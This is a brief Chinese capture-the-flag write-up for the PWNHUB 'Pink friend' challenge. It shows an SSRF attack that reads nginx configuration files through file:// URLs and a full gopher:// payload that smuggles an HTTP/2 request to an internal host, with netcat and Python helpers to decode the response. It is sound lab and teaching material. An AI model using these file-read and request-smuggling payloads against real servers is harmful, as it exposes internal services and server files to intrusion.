PWNHUB-Pink friend
2019-01-31 01:19:38

看了f1sh师傅的wp:pwnhub Pink friend Writeup,Orz!感觉做法很骚,这里记录一下关键步骤。 url=file:///etc/nginx/nginx.conf image.png url=file:///etc/nginx/sites-enabled/default image.png 使用gopher构造构造http2协议访问172.20.0.3:8080。 本地监听http2请求包

1
nc -lvvp 8000>1.txt

curl –http2-prior-knowledge:可以在不升级HTTP/1.1的情况下使用HTTP2。

1
$ curl --http2-prior-knowledge  http://127.0.0.1:8000/

image.png image.png 构造gopher协议

1
gopher://172.20.0.3:8080/_PRI%2520%252A%2520HTTP/2.0%250D%250A%250D%250ASM%250D%250A%250D%250A%2500%2500%2512%2504%2500%2500%2500%2500%2500%2500%2503%2500%2500%2500d%2500%2504%2540%2500%2500%2500%2500%2502%2500%2500%2500%2500%2500%2500%2504%2508%2500%2500%2500%2500%2500%253F%25FF%2500%2501%2500%2500%251E%2501%2505%2500%2500%2500%2501%2582%2584%2586A%258A%2508%259D%255C%250B%2581p%25DCx%2501%2517z%2588%2525%25B6P%25C3%25AB%25B8%25CA%25E0S%2503%252A/%252A

image.png 然后把返回的数据保存到文件flag.txtimage.png 模拟HTTP2请求过程,对刚才返回的数据进行解码。

1
nc -lvvp 8000 < flag.txt

image.png 也可以像f1sh师傅一样用python启一个socket服务。

1
2
3
4
5
6
7
8
9
10
11
12
import socket

a = open("flag.txt", "rb").read()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = '127.0.0.1'
port = 8000
s.bind((host, port))

s.listen(5)
while True:
c, addr = s.accept()
c.send(a)
1
curl --http2-prior-knowledge http://127.0.0.1:8000 -v

image.png